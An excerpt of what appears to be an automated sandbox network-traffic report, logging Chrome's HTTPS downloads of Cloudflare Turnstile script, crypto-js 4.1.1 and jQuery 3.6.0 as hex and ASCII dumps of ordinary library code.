                                                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                            Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                            Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                            Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                            Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.449753104.17.25.144435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:43 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:43 UTC964INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:43 GMT
                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                            ETag: W/"61182885-40eb"
                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            Timing-Allow-Origin: *
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 280658
                                                                                                            Expires: Thu, 11 Dec 2025 23:46:43 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkshgZ6b%2F8kp1zAsTYgyJ3SufnkX65YLfxJ%2FZng8AFHaMxO0o2nfpoGUSmmDqF%2FuX97OlXGZJZCqeRCT9%2BwZOTfM%2F716ehD7loP9mZ0gtfupxacgkj60T5VEjknZGci1SpAlHJdJ"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0cd79df7ca0-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:43 UTC405INData Raw: 33 39 37 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                            Data Ascii: 3977!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                            Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                                                            Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                                                            Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                                                            Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                                                            Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                                                            Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                                                            Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                                                            Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                                                            2024-12-21 23:46:43 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                                                            Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.449754151.101.194.1374435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:43 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                            Host: code.jquery.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:43 UTC612INHTTP/1.1 200 OK
                                                                                                            Connection: close
                                                                                                            Content-Length: 89501
                                                                                                            Server: nginx
                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                            Accept-Ranges: bytes
                                                                                                            Date: Sat, 21 Dec 2024 23:46:43 GMT
                                                                                                            Age: 309329
                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740020-EWR
                                                                                                            X-Cache: HIT, HIT
                                                                                                            X-Cache-Hits: 2774, 8
                                                                                                            X-Timer: S1734824804.705944,VS0,VE0
                                                                                                            Vary: Accept-Encoding
                                                                                                            2024-12-21 23:46:43 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
